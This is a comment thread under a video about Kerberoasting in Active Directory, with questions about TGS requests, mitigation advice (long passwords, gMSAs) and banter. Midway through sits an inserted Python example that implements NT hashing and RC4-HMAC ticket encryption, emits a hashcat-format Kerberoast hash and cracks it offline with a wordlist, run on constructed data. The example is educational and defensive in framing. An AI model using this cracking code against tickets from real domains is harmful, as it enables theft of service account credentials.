This guy is unstoppable, never misses a video, so damn consistent,❤
as a CRTE and CARTP holder, im glad to see alteredsec sponsoring the video. hopefully we'll see the certs appear on more job posting.
So by just getting a user on a domain you can get the TGT and TGS from the domain controller, because it sees you as an authenticated user on the system.
Good stuff John. Thanks.
Thanks. I have done kerberoasting before but never understood what I was doing at this level. Super cool stuff.
first time i needed the subscribe and alarm bell button
Great video man!
Question. When you are enumerating the SPNs are the ones that are vulnerable the user must have access to correct? So if the HTTP SPN was vulnerable but the user did not have access to it they would not be able to get that TGS right?
SPNs are not hidden. Everyone has access to them.
I understand that. But not everyone has access to request the TGS, correct? I.e. SQL Server. Not everyone can get this ticket, as only privileged accounts should be able to access it, so the attacker would need to compromise this type of account. But if the compromised account was a normal user and requested the TGS, wouldn't it not be granted, correct..?
Everyone can request a TGS. The Domain Controller only provides security info about the user (the PAC); it's up to the service account itself to check the user's rights in the TGS.
The security concern here is that the DC uses a piece of the secret of the requested service to encrypt the TGS, which can later be used to brute force/crack the password.
@hammond
What OS do you run on your bare metal?
Most likely either macOS or an SELinux distro
Any valid coupons for CRT? :)
What windows server version did you use ?
I still miss the honey badger video :(
I was contemplating sending a secret message to kelly ripa on X saying that I learned that she was basically on soultrain from Questlove.
Great job...greetings from italy
So many of these attacks rely on already having domain admin or schema admin, or assume that the IT staff is hopelessly incompetent.
No, domain admin and schema admin are not required for Kerberoasting. Those were just used to set up an SPN in AD so that he had something to attack. The actual Kerberoasting was just the last 2 minutes of the video.
@BrownCoatFan Thanks
And there are plenty of incompetent AD admins out there.
So this is why you've been asking twitter for the password? 😂
😂😂😂😂😂
Awesome content 👏
Simply amazing!!!
That's crazy - how does a typical AD setup prevent this? Is there some other system/service in place that prevents you obtaining hashes in the first place, or is it more so a matter of good password strength policies so that something like John can't crack the hashes as easily?
Yes, use a very long (25 characters) and complex password.
Prefer gMSA if your app/system supports it. If not, a long, very complex password could help...
@Nawdiral gMSAs are so nice. Password lifetime of 24 hrs and a length of 120 chars. Also, they do not pretend to be user accounts.
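An added worked example, not code from the video or from any commenter, tying together two points in this thread: the reply above explaining that the DC encrypts the TGS with a piece of the service's secret, and the mitigation replies about password length and gMSAs. For RC4-HMAC (etype 23), that "piece of the secret" is the service account's NT hash, so the captured ticket is a password oracle that can be attacked offline. The block below implements the RC4-HMAC encryption a KDC performs on the ticket's enc-part, formats the result as the `$krb5tgs$23$` line Impacket/Rubeus emit for hashcat mode 13100, and then "cracks" it with a wordlist using nothing but the ticket bytes. The account name, realm, SPN, password, ticket body and wordlist are all constructed for the demo; a real enc-part is ASN.1 (EncTicketPart with the session key and PAC), but the cipher does not care about its structure.

```python
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
TGS_REP_TICKET_USAGE = 2  # RFC 4120 key usage for a ticket's enc-part


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because the NT hash is MD4 and many OpenSSL builds no longer ship it."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = [  # (boolean function, message-word order, shift amounts, additive constant)
        (lambda x, y, z: (x & y) | (~x & z), list(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    ]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, order, shifts, k in rounds:
            for i, w in enumerate(order):  # rotate registers so one expression covers A/D/C/B steps
                a, b, c, d = d, _rotl((a + f(b, c, d) + x[w] + k) & MASK, shifts[i % 4]), b, c
        h = [(v + n) & MASK for v, n in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The NT hash is MD4 over the UTF-16LE password; it is the etype-23 Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = None) -> bytes:
    """RFC 4757 RC4-HMAC encryption: what the KDC does to the ticket with the service's key."""
    confounder = confounder or os.urandom(8)
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, confounder + plaintext)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_decrypt(key: bytes, usage: int, ciphertext: bytes):
    """Returns the plaintext (confounder stripped) if the checksum verifies, else None."""
    checksum, edata = ciphertext[:16], ciphertext[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plain = rc4(_hmac_md5(k1, checksum), edata)
    return plain[8:] if hmac.compare_digest(_hmac_md5(k1, plain), checksum) else None


def to_hashcat(user: str, realm: str, spn: str, ciphertext: bytes) -> str:
    """The $krb5tgs$23$ line as GetUserSPNs.py / Rubeus write it for hashcat -m 13100."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${ciphertext[:16].hex()}${ciphertext[16:].hex()}"


def crack(line: str, wordlist) -> str:
    """Offline guessing: each candidate yields a key; the checksum tells us if it was right."""
    _, blob = line.rsplit("*$", 1)
    checksum_hex, edata_hex = blob.split("$")
    ciphertext = bytes.fromhex(checksum_hex + edata_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), TGS_REP_TICKET_USAGE, ciphertext) is not None:
            return candidate
    return None


# Constructed sample data (not from any real domain).
SERVICE_PASSWORD = "Summer2023!"
TICKET_BODY = b"EncTicketPart: session key + PAC for CORP\\alice (constructed placeholder)"
WORDLIST = ["Password1", "Welcome123", "Summer2023!", "P@ssw0rd"]


def demo() -> str:
    ticket = rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), TGS_REP_TICKET_USAGE, TICKET_BODY, b"\x00" * 8)
    line = to_hashcat("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", ticket)
    return crack(line, WORDLIST)


if __name__ == "__main__":
    print(demo())
```

Nothing in `crack` talks to a DC: one TGS request per SPN, which any authenticated user can make, is the only online step, and everything after that is bounded by how many NT hashes the attacker can compute per second. That is why the mitigation replies above are the right ones: a 25+ character random password, or a gMSA whose 120-character password rotates automatically, pushes the keyspace far beyond any wordlist or mask, and enabling AES-only on the service account removes the fast RC4 key derivation shown here.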
Finally man
thanks 👍
🔥🔥🔥🔥🔥
Use excalidraw next time 😂
It is a shame there's no easy way to snapshot an AD, no?
It's amazing how a 22 minute video about kerberoasting only has about 2 minutes worth of kerberoasting
I’m sayin😂
😃 🚀 ❤️
Alh4zr3d, is it you 🤨🤭😅🥳
first
👑 here's your crown
@baxsm thanks bud
Frist hehe
You know, talking this fast, you're not really teaching anything as much as blowing through content that isn't digestible by people.
I mean... yeah; with domain admin privileges anything is possible. So? That's like saying "root bad! root evil!". Yes. Yes, it is. Very. Much more than you can imagine. So?
Kerberoasting is done from any low-privilege domain user. We used the domain user account "Alice".
Every time I watch @johnhammond I just feel like an idiot, so unworthy 😞
I like you, but this one was a weak video. The whole scripting thing is way too much to "learn Active Directory Kerberoasting".
Pretty useless information if you have a minimum requirement of at least 13 characters with good complexity, a good EDR installed, etc.
@hammond
What OS do you run on your bare metal?
If you mean OS running on his real machine then it's Windows 10